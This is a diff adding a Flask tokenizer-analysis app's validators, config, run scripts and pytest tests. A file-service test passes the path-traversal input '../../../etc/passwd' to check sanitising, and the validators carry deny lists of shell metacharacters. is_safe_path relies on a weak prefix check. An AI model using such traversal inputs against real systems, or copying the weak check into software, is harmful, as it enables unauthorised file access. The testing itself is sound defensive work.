+ <div class="frequency-chart-container" id="frequencyChartContainer" style="display: none;">
153
+ <div class="frequency-chart-title">
154
+ <span>Top Token Frequencies</span>
155
+ <button class="chart-toggle-btn" id="toggleFrequencyChart">Show Chart</button>
156
+ </div>
157
+ <div class="frequency-chart" id="frequencyChart"></div>
158
+ </div>
159
+ </div>
160
+
161
+ <div class="stats-grid">
162
+ <div class="stat-card">
163
+ <div class="stat-title">Total Tokens</div>
164
+ <div class="stat-value" id="totalTokens">{{ token_data.stats.basic_stats.total_tokens if token_data else 0 }}</div>
165
+ <div class="stat-description">
166
+ <span id="uniqueTokens">{{ token_data.stats.basic_stats.unique_tokens if token_data else 0 }} unique</span>
167
+ (<span id="uniquePercentage">{{ token_data.stats.basic_stats.unique_percentage if token_data else 0 }}</span>%)
168
+ </div>
169
+ </div>
170
+ <div class="stat-card">
171
+ <div class="stat-title">Token Types</div>
172
+ <div class="stat-value" id="specialTokens">{{ token_data.stats.basic_stats.special_tokens if token_data else 0 }}</div>
173
+ <div class="stat-description">special tokens</div>
174
+ </div>
175
+ <div class="stat-card">
176
+ <div class="stat-title">Whitespace</div>
177
+ <div class="stat-value" id="spaceTokens">{{ token_data.stats.basic_stats.space_tokens if token_data else 0 }}</div>
178
+ <div class="stat-description">
179
+ spaces: <span id="spaceCount">{{ token_data.stats.basic_stats.space_tokens if token_data else 0 }}</span>,
180
+ newlines: <span id="newlineCount">{{ token_data.stats.basic_stats.newline_tokens if token_data else 0 }}</span>
181
+ </div>
182
+ </div>
183
+ <div class="stat-card">
184
+ <div class="stat-title">Token Length</div>
185
+ <div class="stat-value" id="avgLength">{{ token_data.stats.length_stats.avg_length if token_data else 0 }}</div>
186
+ <div class="stat-description">
187
+ median: <span id="medianLength">{{ token_data.stats.length_stats.median_length if token_data else 0 }}</span>,
188
+ ±<span id="stdDev">{{ token_data.stats.length_stats.std_dev if token_data else 0 }}</span> std
189
+ </div>
190
+ </div>
191
+ <div class="stat-card">
192
+ <div class="stat-title">Compression</div>
193
+ <div class="stat-value" id="compressionRatio">{{ token_data.stats.basic_stats.compression_ratio if token_data else 0 }}</div>
194
+ <div class="stat-description">characters per token</div>
195
+ </div>
196
+ </div>
197
+ </div>
198
+ </div>
199
+ <a href="https://huggingface.co/spaces/bartar/tokenizers" target="_blank" class="watermark">
200
+ @bartar/tokenizers
201
+ </a>
202
+
203
+ <script>
204
+ // Pass server data to client-side JavaScript
205
+ window.tokenizerData = {
206
+ model_type: "{{ model_type if model_type else 'predefined' }}",
207
+ error: "{{ error if error else '' }}",
208
+ tokenizer_info: {{ token_data.tokenizer_info|tojson if token_data and token_data.tokenizer_info else 'null' }}
209
+ };
210
+ </script>
211
+ <script src="{{ url_for('static', filename='js/main.js') }}"></script>
212
+ </body>
213
+ </html>
app/utils/__init__.py ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ """
2
+ Utility functions for Tokenizer Pro
3
+ """
app/utils/validators.py ADDED
@@ -0,0 +1,211 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """
2
+ Validation utilities for security and input validation
3
+ """
4
+ import os
5
+ import re
6
+ from typing import Optional
7
+ from urllib.parse import urlparse
8
+
9
+
10
+ class ValidationError(Exception):
11
+ """Custom exception for validation errors."""
12
+ pass
13
+
14
+
15
+ class Validators:
16
+ """Collection of validation functions for security and input validation."""
17
+
18
+ # Regex patterns for validation - allow numbers, letters, hyphens, underscores, dots
19
+ HUGGINGFACE_MODEL_PATTERN = re.compile(r'^[a-zA-Z0-9_\-\.]+/[a-zA-Z0-9_\-\.]+$')
20
+ SAFE_FILENAME_PATTERN = re.compile(r'^[a-zA-Z0-9_\-\.]+$')
21
+
22
+ @staticmethod
23
+ def validate_model_path(model_path: str) -> bool:
24
+ """
25
+ Validate that a custom model path is safe and follows expected patterns.
26
+
27
+ Args:
28
+ model_path: The model path to validate
29
+
30
+ Returns:
31
+ bool: True if valid, False otherwise
32
+
33
+ Raises:
34
+ ValidationError: If the model path is invalid
35
+ """
36
+ if not model_path or not isinstance(model_path, str):
37
+ raise ValidationError("Model path cannot be empty")
38
+
39
+ # Trim whitespace
40
+ model_path = model_path.strip()
41
+
42
+ # Check for dangerous characters (excluding single forward slash for HuggingFace format)
43
+ dangerous_chars = ['..', '\\', '|', ';', '&', '$', '`', '<', '>']
44
+ if any(char in model_path for char in dangerous_chars):
45
+ raise ValidationError("Model path contains invalid characters")
46
+
47
+ # Check for multiple slashes or leading/trailing slashes
48
+ if '//' in model_path or model_path.startswith('/') or model_path.endswith('/'):
49
+ raise ValidationError("Model path contains invalid characters")
50
+
51
+ # Check if it looks like a HuggingFace model path (user/model format)
52
+ if not Validators.HUGGINGFACE_MODEL_PATTERN.match(model_path):
53
+ raise ValidationError("Model path must follow the format 'organization/model-name'")
54
+
55
+ # Check length limits
56
+ if len(model_path) > 200:
57
+ raise ValidationError("Model path is too long")
58
+
59
+ return True
60
+
61
+ @staticmethod
62
+ def validate_filename(filename: str) -> bool:
63
+ """
64
+ Validate that a filename is safe for upload.
65
+
66
+ Args:
67
+ filename: The filename to validate
68
+
69
+ Returns:
70
+ bool: True if valid, False otherwise
71
+
72
+ Raises:
73
+ ValidationError: If the filename is invalid
74
+ """
75
+ if not filename or not isinstance(filename, str):
76
+ raise ValidationError("Filename cannot be empty")
77
+
78
+ # Check for dangerous characters and patterns
79
+ dangerous_patterns = ['..', '/', '\\', '|', ';', '&', '$', '`', '<', '>']
80
+ if any(pattern in filename for pattern in dangerous_patterns):
81
+ raise ValidationError("Filename contains invalid characters")
82
+
83
+ # Check if filename starts with a dot (hidden files)
84
+ if filename.startswith('.'):
85
+ raise ValidationError("Hidden files are not allowed")
86
+
87
+ # Check length
88
+ if len(filename) > 255:
89
+ raise ValidationError("Filename is too long")
90
+
91
+ return True
92
+
93
+ @staticmethod
94
+ def validate_file_extension(filename: str, allowed_extensions: set) -> bool:
95
+ """
96
+ Validate that a file has an allowed extension.
97
+
98
+ Args:
99
+ filename: The filename to check
100
+ allowed_extensions: Set of allowed extensions (e.g., {'.txt', '.py'})
101
+
102
+ Returns:
103
+ bool: True if valid, False otherwise
104
+
105
+ Raises:
106
+ ValidationError: If the extension is not allowed
107
+ """
108
+ if not filename:
109
+ raise ValidationError("Filename cannot be empty")
110
+
111
+ _, ext = os.path.splitext(filename.lower())
112
+ if ext not in allowed_extensions:
113
+ allowed_list = ', '.join(sorted(allowed_extensions))
114
+ raise ValidationError(f"File type '{ext}' not allowed. Allowed types: {allowed_list}")
115
+
116
+ return True
117
+
118
+ @staticmethod
119
+ def validate_file_size(file_size: int, max_size: int) -> bool:
120
+ """
121
+ Validate that a file size is within limits.
122
+
123
+ Args:
124
+ file_size: Size of the file in bytes
125
+ max_size: Maximum allowed size in bytes
126
+
127
+ Returns:
128
+ bool: True if valid, False otherwise
129
+
130
+ Raises:
131
+ ValidationError: If the file is too large
132
+ """
133
+ if file_size > max_size:
134
+ max_mb = max_size / (1024 * 1024)
135
+ current_mb = file_size / (1024 * 1024)
136
+ raise ValidationError(f"File too large: {current_mb:.1f}MB (max: {max_mb:.1f}MB)")
137
+
138
+ return True
139
+
140
+ @staticmethod
141
+ def validate_text_input(text: str, max_length: int = 1000000) -> bool:
142
+ """
143
+ Validate text input for processing.
144
+
145
+ Args:
146
+ text: The text to validate
147
+ max_length: Maximum allowed length
148
+
149
+ Returns:
150
+ bool: True if valid, False otherwise
151
+
152
+ Raises:
153
+ ValidationError: If the text is invalid
154
+ """
155
+ if not isinstance(text, str):
156
+ raise ValidationError("Text input must be a string")
157
+
158
+ if len(text) > max_length:
159
+ raise ValidationError(f"Text too long: {len(text)} characters (max: {max_length})")
160
+
161
+ return True
162
+
163
+ @staticmethod
164
+ def sanitize_model_path(model_path: str) -> str:
165
+ """
166
+ Sanitize a model path by removing potentially dangerous elements.
167
+
168
+ Args:
169
+ model_path: The model path to sanitize
170
+
171
+ Returns:
172
+ str: Sanitized model path
173
+ """
174
+ if not model_path:
175
+ return ""
176
+
177
+ # Remove whitespace
178
+ sanitized = model_path.strip()
179
+
180
+ # Remove any path traversal attempts
181
+ sanitized = sanitized.replace('..', '')
182
+ sanitized = sanitized.replace('/', '')
183
+ sanitized = sanitized.replace('\\', '')
184
+
185
+ return sanitized
186
+
187
+ @staticmethod
188
+ def is_safe_path(path: str, base_path: str) -> bool:
189
+ """
190
+ Check if a path is safe and within the expected base directory.
191
+
192
+ Args:
193
+ path: The path to check
194
+ base_path: The base directory that the path should be within
195
+
196
+ Returns:
197
+ bool: True if the path is safe, False otherwise
198
+ """
199
+ try:
200
+ # Resolve both paths to absolute paths
201
+ abs_path = os.path.abspath(path)
202
+ abs_base = os.path.abspath(base_path)
203
+
204
+ # Check if the path is within the base directory
205
+ return abs_path.startswith(abs_base)
206
+ except (OSError, ValueError):
207
+ return False
208
+
209
+
210
+ # Global instance
211
+ validators = Validators()
config.py ADDED
@@ -0,0 +1,66 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import os
2
+ from dataclasses import dataclass, field
3
+ from typing import List
4
+
5
+ @dataclass
6
+ class Config:
7
+ """Centralized configuration for Tokenizer Pro application."""
8
+
9
+ # Flask settings
10
+ SECRET_KEY: str = os.getenv('SECRET_KEY', 'tokenizer-pro-secret-key-change-in-production')
11
+ DEBUG: bool = os.getenv('DEBUG', 'False').lower() in ('true', '1', 'yes')
12
+
13
+ # File upload settings
14
+ MAX_CONTENT_LENGTH: int = int(os.getenv('MAX_CONTENT_LENGTH', 25 * 1024 * 1024)) # 25MB
15
+ UPLOAD_FOLDER: str = os.getenv('UPLOAD_FOLDER', '/tmp/tokenizer_uploads')
16
+ ALLOWED_EXTENSIONS: List[str] = field(default_factory=lambda: ['txt', 'md', 'py', 'js', 'html', 'css', 'json', 'xml', 'csv'])
17
+
18
+ # Tokenizer caching settings
19
+ CACHE_SIZE: int = int(os.getenv('CACHE_SIZE', 10))
20
+ CACHE_EXPIRATION: int = int(os.getenv('CACHE_EXPIRATION', 3600)) # 1 hour in seconds
21
+
22
+ # Display limits
23
+ MAX_DISPLAY_TOKENS: int = int(os.getenv('MAX_DISPLAY_TOKENS', 50000))
24
+ PREVIEW_CHAR_LIMIT: int = int(os.getenv('PREVIEW_CHAR_LIMIT', 8096))
25
+
26
+ # Performance settings
27
+ CHUNK_SIZE: int = int(os.getenv('CHUNK_SIZE', 1024 * 1024)) # 1MB chunks for file processing
28
+
29
+ # Security settings
30
+ VALIDATE_MODEL_PATHS: bool = os.getenv('VALIDATE_MODEL_PATHS', 'True').lower() in ('true', '1', 'yes')
31
+ ALLOWED_MODEL_PREFIXES: List[str] = field(default_factory=lambda: [
32
+ 'microsoft/', 'google/', 'meta-llama/', 'mistralai/', 'openai-community/',
33
+ 'Qwen/', 'THUDM/', 'deepseek-ai/', 'unsloth/', 'google-bert/', 'bartar/'
34
+ ])
35
+
36
+ # HuggingFace settings
37
+ HF_HOME: str = os.getenv('HF_HOME', '/tmp/huggingface')
38
+ HF_CACHE_DIR: str = os.getenv('HF_CACHE_DIR', '/tmp/huggingface/cache')
39
+
40
+ # Logging settings
41
+ LOG_LEVEL: str = os.getenv('LOG_LEVEL', 'INFO')
42
+ LOG_FILE: str = os.getenv('LOG_FILE', 'tokenizer_pro.log')
43
+ LOG_MAX_BYTES: int = int(os.getenv('LOG_MAX_BYTES', 10 * 1024 * 1024)) # 10MB
44
+ LOG_BACKUP_COUNT: int = int(os.getenv('LOG_BACKUP_COUNT', 3))
45
+
46
+ class DevelopmentConfig(Config):
47
+ """Development configuration with debug enabled."""
48
+ DEBUG = True
49
+ SECRET_KEY = 'dev-secret-key'
50
+
51
+ class ProductionConfig(Config):
52
+ """Production configuration with enhanced security."""
53
+ DEBUG = False
54
+ SECRET_KEY = os.getenv('SECRET_KEY', None)
55
+
56
+ def __post_init__(self):
57
+ if not self.SECRET_KEY:
58
+ raise ValueError("SECRET_KEY must be set in production environment")
59
+
60
+ class TestingConfig(Config):
61
+ """Testing configuration."""
62
+ TESTING = True
63
+ DEBUG = True
64
+ UPLOAD_FOLDER = '/tmp/test_uploads'
65
+ CACHE_SIZE = 2
66
+ MAX_DISPLAY_TOKENS = 100
pytest.ini ADDED
@@ -0,0 +1,13 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ [tool:pytest]
2
+ testpaths = tests
3
+ python_files = test_*.py
4
+ python_classes = Test*
5
+ python_functions = test_*
6
+ addopts = -v --tb=short --strict-markers
7
+ markers =
8
+ slow: marks tests as slow (deselect with '-m "not slow"')
9
+ integration: marks tests as integration tests
10
+ unit: marks tests as unit tests
11
+ filterwarnings =
12
+ ignore::DeprecationWarning
13
+ ignore::PendingDeprecationWarning
requirements.txt ADDED
@@ -0,0 +1,7 @@
 
 
 
 
 
 
 
 
1
+ flask>=2.3.0
2
+ transformers>=4.30.0
3
+ torch>=2.0.0
4
+ werkzeug>=2.3.0
5
+ psutil>=5.9.0
6
+ pytest>=7.0.0
7
+ pytest-flask>=1.2.0
run.py ADDED
@@ -0,0 +1,31 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #!/usr/bin/env python3
2
+ """
3
+ Tokenizer Pro - Advanced tokenization analysis and visualization
4
+
5
+ This is the main entry point for the Flask application.
6
+ """
7
+
8
+ import os
9
+ from app import create_app
10
+ from config import Config, DevelopmentConfig, ProductionConfig
11
+
12
+ def get_config_class():
13
+ """Determine which configuration class to use based on environment."""
14
+ env = os.getenv('FLASK_ENV', 'development').lower()
15
+
16
+ if env == 'production':
17
+ return ProductionConfig
18
+ elif env == 'development':
19
+ return DevelopmentConfig
20
+ else:
21
+ return Config
22
+
23
+ app = create_app(get_config_class())
24
+
25
+ if __name__ == "__main__":
26
+ # Get configuration from environment variables
27
+ host = os.getenv('HOST', '0.0.0.0')
28
+ port = int(os.getenv('PORT', 7860))
29
+ debug = os.getenv('DEBUG', 'False').lower() in ('true', '1', 'yes')
30
+
31
+ app.run(host=host, port=port, debug=debug)
run_tests.py ADDED
@@ -0,0 +1,63 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #!/usr/bin/env python3
2
+ """
3
+ Test runner script for Tokenizer Pro
4
+
5
+ Usage:
6
+ python run_tests.py # Run all tests
7
+ python run_tests.py unit # Run only unit tests
8
+ python run_tests.py integration # Run only integration tests
9
+ python run_tests.py --coverage # Run with coverage report
10
+ """
11
+
12
+ import sys
13
+ import subprocess
14
+ import os
15
+
16
+
17
+ def run_command(cmd):
18
+ """Run a command and return the exit code."""
19
+ print(f"Running: {' '.join(cmd)}")
20
+ return subprocess.call(cmd)
21
+
22
+
23
+ def main():
24
+ """Main test runner function."""
25
+ args = sys.argv[1:]
26
+
27
+ # Base pytest command
28
+ pytest_cmd = ["python", "-m", "pytest"]
29
+
30
+ # Parse arguments
31
+ if "--coverage" in args:
32
+ pytest_cmd.extend(["--cov=app", "--cov-report=html", "--cov-report=term"])
33
+ args.remove("--coverage")
34
+
35
+ if "unit" in args:
36
+ pytest_cmd.extend([
37
+ "tests/test_tokenizer_service.py",
38
+ "tests/test_stats_service.py",
39
+ "tests/test_file_service.py",
40
+ "tests/test_validators.py"
41
+ ])
42
+ elif "integration" in args:
43
+ pytest_cmd.append("tests/test_routes.py")
44
+ else:
45
+ # Run all tests
46
+ pytest_cmd.append("tests/")
47
+
48
+ # Add any remaining arguments
49
+ pytest_cmd.extend(args)
50
+
51
+ # Run the tests
52
+ exit_code = run_command(pytest_cmd)
53
+
54
+ if exit_code == 0:
55
+ print("\n✅ All tests passed!")
56
+ else:
57
+ print(f"\n❌ Tests failed with exit code {exit_code}")
58
+
59
+ return exit_code
60
+
61
+
62
+ if __name__ == "__main__":
63
+ sys.exit(main())
tests/__init__.py ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ """
2
+ Test package for Tokenizer Pro
3
+ """
tests/conftest.py ADDED
@@ -0,0 +1,77 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """
2
+ pytest configuration file
3
+ """
4
+ import pytest
5
+ import os
6
+ import tempfile
7
+ from unittest.mock import Mock, patch
8
+ from flask import Flask
9
+
10
+ # Add the parent directory to Python path so we can import the app
11
+ import sys
12
+ sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
13
+
14
+ from app import create_app
15
+ from config import TestingConfig
16
+
17
+
18
+ @pytest.fixture
19
+ def app():
20
+ """Create a test Flask application."""
21
+ app = create_app(TestingConfig())
22
+
23
+ # Create a temporary directory for file uploads during testing
24
+ with tempfile.TemporaryDirectory() as temp_dir:
25
+ app.config['UPLOAD_FOLDER'] = temp_dir
26
+ app.config['TESTING'] = True
27
+ yield app
28
+
29
+
30
+ @pytest.fixture
31
+ def client(app):
32
+ """Create a test client."""
33
+ return app.test_client()
34
+
35
+
36
+ @pytest.fixture
37
+ def mock_tokenizer():
38
+ """Create a mock tokenizer for testing."""
39
+ tokenizer = Mock()
40
+ tokenizer.tokenize.return_value = ['Hello', 'world', '!']
41
+ tokenizer.vocab_size = 50257
42
+ tokenizer.model_max_length = 1024
43
+ tokenizer.__class__.__name__ = 'MockTokenizer'
44
+
45
+ # Mock special tokens
46
+ tokenizer.pad_token = '<pad>'
47
+ tokenizer.eos_token = '</s>'
48
+ tokenizer.unk_token = '<unk>'
49
+ tokenizer.bos_token = '<s>'
50
+
51
+ return tokenizer
52
+
53
+
54
+ @pytest.fixture
55
+ def sample_text():
56
+ """Sample text for testing."""
57
+ return "Hello world! This is a test."
58
+
59
+
60
+ @pytest.fixture
61
+ def sample_tokens():
62
+ """Sample tokens for testing."""
63
+ return ['Hello', ' world', '!', ' This', ' is', ' a', ' test', '.']
64
+
65
+
66
+ @pytest.fixture
67
+ def temp_file():
68
+ """Create a temporary file for testing."""
69
+ with tempfile.NamedTemporaryFile(mode='w', suffix='.txt', delete=False) as f:
70
+ f.write("Hello world! This is a test file.")
71
+ temp_path = f.name
72
+
73
+ yield temp_path
74
+
75
+ # Cleanup
76
+ if os.path.exists(temp_path):
77
+ os.unlink(temp_path)
tests/test_file_service.py ADDED
@@ -0,0 +1,294 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """
2
+ Unit tests for FileService
3
+ """
4
+ import pytest
5
+ import os
6
+ import tempfile
7
+ from unittest.mock import Mock, patch, mock_open
8
+ from werkzeug.datastructures import FileStorage
9
+ from io import BytesIO
10
+ from app.services.file_service import FileService
11
+
12
+
13
+ class TestFileService:
14
+ """Test cases for FileService."""
15
+
16
+ def setup_method(self):
17
+ """Set up test fixtures."""
18
+ self.service = FileService()
19
+
20
+ def test_is_allowed_file_valid_extensions(self):
21
+ """Test allowed file extension checking."""
22
+ # Valid extensions
23
+ assert self.service.is_allowed_file('test.txt') is True
24
+ assert self.service.is_allowed_file('document.md') is True
25
+ assert self.service.is_allowed_file('script.py') is True
26
+ assert self.service.is_allowed_file('code.js') is True
27
+ assert self.service.is_allowed_file('data.json') is True
28
+ assert self.service.is_allowed_file('styles.css') is True
29
+ assert self.service.is_allowed_file('page.html') is True
30
+ assert self.service.is_allowed_file('data.csv') is True
31
+ assert self.service.is_allowed_file('app.log') is True
32
+
33
+ def test_is_allowed_file_invalid_extensions(self):
34
+ """Test invalid file extensions."""
35
+ # Invalid extensions
36
+ assert self.service.is_allowed_file('virus.exe') is False
37
+ assert self.service.is_allowed_file('archive.zip') is False
38
+ assert self.service.is_allowed_file('image.jpg') is False
39
+ assert self.service.is_allowed_file('document.pdf') is False
40
+ assert self.service.is_allowed_file('data.xlsx') is False
41
+
42
+ def test_is_allowed_file_edge_cases(self):
43
+ """Test edge cases for file extension checking."""
44
+ # Empty filename
45
+ assert self.service.is_allowed_file('') is False
46
+ assert self.service.is_allowed_file(None) is False
47
+
48
+ # No extension
49
+ assert self.service.is_allowed_file('filename') is False
50
+
51
+ # Multiple dots
52
+ assert self.service.is_allowed_file('file.backup.txt') is True
53
+
54
+ # Case sensitivity
55
+ assert self.service.is_allowed_file('FILE.TXT') is True
56
+ assert self.service.is_allowed_file('Document.MD') is True
57
+
58
+ def test_generate_secure_filename_basic(self):
59
+ """Test basic secure filename generation."""
60
+ filename = self.service.generate_secure_filename('test.txt')
61
+
62
+ assert filename.endswith('_test.txt')
63
+ assert len(filename) > len('test.txt') # Should have UUID prefix
64
+
65
+ # Should be different each time
66
+ filename2 = self.service.generate_secure_filename('test.txt')
67
+ assert filename != filename2
68
+
69
+ def test_generate_secure_filename_special_characters(self):
70
+ """Test secure filename with special characters."""
71
+ # Test filename with spaces and special chars
72
+ filename = self.service.generate_secure_filename('my file name.txt')
73
+ assert 'my_file_name.txt' in filename
74
+
75
+ # Test with path separators (should be removed)
76
+ filename = self.service.generate_secure_filename('../../../etc/passwd')
77
+ assert '..' not in filename
78
+ assert '/' not in filename
79
+ assert '\\' not in filename
80
+
81
+ def test_generate_secure_filename_empty_input(self):
82
+ """Test secure filename generation with empty input."""
83
+ filename = self.service.generate_secure_filename('')
84
+ assert filename.endswith('.txt')
85
+ assert len(filename) > 4 # Should have UUID
86
+
87
+ filename = self.service.generate_secure_filename(None)
88
+ assert filename.endswith('.txt')
89
+ assert len(filename) > 4
90
+
91
+ @patch('os.makedirs')
92
+ def test_save_uploaded_file_basic(self, mock_makedirs, temp_file):
93
+ """Test basic file upload saving."""
94
+ # Create a mock uploaded file
95
+ file_content = b"Hello world!"
96
+ uploaded_file = FileStorage(
97
+ stream=BytesIO(file_content),
98
+ filename='test.txt',
99
+ content_type='text/plain'
100
+ )
101
+
102
+ upload_folder = '/tmp/test_uploads'
103
+
104
+ with patch('builtins.open', mock_open()) as mock_file:
105
+ file_path = self.service.save_uploaded_file(uploaded_file, upload_folder)
106
+
107
+ # Check that directory creation was attempted
108
+ mock_makedirs.assert_called_once_with(upload_folder, exist_ok=True)
109
+
110
+ # Check that file path has correct structure
111
+ assert file_path.startswith(upload_folder)
112
+ assert file_path.endswith('_test.txt')
113
+
114
+ def test_cleanup_file_existing(self, temp_file):
115
+ """Test cleanup of existing file."""
116
+ # Verify file exists
117
+ assert os.path.exists(temp_file)
118
+
119
+ # Cleanup
120
+ self.service.cleanup_file(temp_file)
121
+
122
+ # Verify file is deleted
123
+ assert not os.path.exists(temp_file)
124
+
125
+ def test_cleanup_file_nonexistent(self):
126
+ """Test cleanup of non-existent file (should not raise error)."""
127
+ # Should not raise an exception
128
+ self.service.cleanup_file('/path/that/does/not/exist.txt')
129
+
130
+ @patch('app.services.file_service.tokenizer_service')
131
+ @patch('app.services.file_service.stats_service')
132
+ def test_process_file_for_tokenization_basic(self, mock_stats, mock_tokenizer, temp_file):
133
+ """Test basic file processing for tokenization."""
134
+ # Mock tokenizer service
135
+ mock_tokenizer_obj = Mock()
136
+ mock_tokenizer_obj.tokenize.return_value = ['Hello', ' world', '!']
137
+ mock_tokenizer.load_tokenizer.return_value = (mock_tokenizer_obj, {}, None)
138
+
139
+ # Mock stats service
140
+ mock_stats.get_token_stats.return_value = {
141
+ 'basic_stats': {'total_tokens': 3},
142
+ 'length_stats': {'avg_length': '2.0'}
143
+ }
144
+ mock_stats.format_tokens_for_display.return_value = [
145
+ {'display': 'Hello', 'original': 'Hello', 'token_id': 1, 'colors': {}, 'newline': False}
146
+ ]
147
+
148
+ result = self.service.process_file_for_tokenization(
149
+ file_path=temp_file,
150
+ model_id_or_name='gpt2',
151
+ preview_char_limit=1000,
152
+ max_display_tokens=100,
153
+ chunk_size=1024
154
+ )
155
+
156
+ assert isinstance(result, dict)
157
+ assert 'tokens' in result
158
+ assert 'stats' in result
159
+ assert 'display_limit_reached' in result
160
+ assert 'total_tokens' in result
161
+ assert 'preview_only' in result
162
+ assert 'tokenizer_info' in result
163
+
164
+ @patch('app.services.file_service.tokenizer_service')
165
+ def test_process_file_tokenizer_error(self, mock_tokenizer, temp_file):
166
+ """Test file processing with tokenizer error."""
167
+ # Mock tokenizer service to return error
168
+ mock_tokenizer.load_tokenizer.return_value = (None, {}, "Tokenizer error")
169
+
170
+ with pytest.raises(Exception) as excinfo:
171
+ self.service.process_file_for_tokenization(
172
+ file_path=temp_file,
173
+ model_id_or_name='invalid-model',
174
+ preview_char_limit=1000,
175
+ max_display_tokens=100
176
+ )
177
+
178
+ assert "Tokenizer error" in str(excinfo.value)
179
+
180
+ @patch('app.services.file_service.tokenizer_service')
181
+ @patch('app.services.file_service.stats_service')
182
+ def test_process_text_for_tokenization_basic(self, mock_stats, mock_tokenizer):
183
+ """Test basic text processing for tokenization."""
184
+ # Mock tokenizer service
185
+ mock_tokenizer_obj = Mock()
186
+ mock_tokenizer_obj.tokenize.return_value = ['Hello', ' world']
187
+ mock_tokenizer.load_tokenizer.return_value = (mock_tokenizer_obj, {'vocab_size': 1000}, None)
188
+
189
+ # Mock stats service
190
+ mock_stats.get_token_stats.return_value = {
191
+ 'basic_stats': {'total_tokens': 2},
192
+ 'length_stats': {'avg_length': '3.0'}
193
+ }
194
+ mock_stats.format_tokens_for_display.return_value = [
195
+ {'display': 'Hello', 'original': 'Hello', 'token_id': 1, 'colors': {}, 'newline': False},
196
+ {'display': ' world', 'original': ' world', 'token_id': 2, 'colors': {}, 'newline': False}
197
+ ]
198
+
199
+ result = self.service.process_text_for_tokenization(
200
+ text="Hello world",
201
+ model_id_or_name='gpt2',
202
+ max_display_tokens=100
203
+ )
204
+
205
+ assert isinstance(result, dict)
206
+ assert 'tokens' in result
207
+ assert 'stats' in result
208
+ assert result['display_limit_reached'] is False
209
+ assert result['total_tokens'] == 2
210
+ assert result['tokenizer_info']['vocab_size'] == 1000
211
+
212
+ @patch('app.services.file_service.tokenizer_service')
213
+ @patch('app.services.file_service.stats_service')
214
+ def test_process_text_display_limit(self, mock_stats, mock_tokenizer):
215
+ """Test text processing with display limit."""
216
+ # Create a large number of tokens
217
+ tokens = [f'token{i}' for i in range(200)]
218
+
219
+ # Mock tokenizer service
220
+ mock_tokenizer_obj = Mock()
221
+ mock_tokenizer_obj.tokenize.return_value = tokens
222
+ mock_tokenizer.load_tokenizer.return_value = (mock_tokenizer_obj, {}, None)
223
+
224
+ # Mock stats service
225
+ mock_stats.get_token_stats.return_value = {
226
+ 'basic_stats': {'total_tokens': 200},
227
+ 'length_stats': {'avg_length': '6.0'}
228
+ }
229
+ mock_stats.format_tokens_for_display.return_value = []
230
+
231
+ result = self.service.process_text_for_tokenization(
232
+ text="Long text",
233
+ model_id_or_name='gpt2',
234
+ max_display_tokens=100 # Limit lower than token count
235
+ )
236
+
237
+ assert result['display_limit_reached'] is True
238
+ assert result['total_tokens'] == 200
239
+
240
+ @patch('app.services.file_service.tokenizer_service')
241
+ def test_process_text_tokenizer_error(self, mock_tokenizer):
242
+ """Test text processing with tokenizer error."""
243
+ # Mock tokenizer service to return error
244
+ mock_tokenizer.load_tokenizer.return_value = (None, {}, "Model not found")
245
+
246
+ with pytest.raises(Exception) as excinfo:
247
+ self.service.process_text_for_tokenization(
248
+ text="Hello world",
249
+ model_id_or_name='invalid-model'
250
+ )
251
+
252
+ assert "Model not found" in str(excinfo.value)
253
+
254
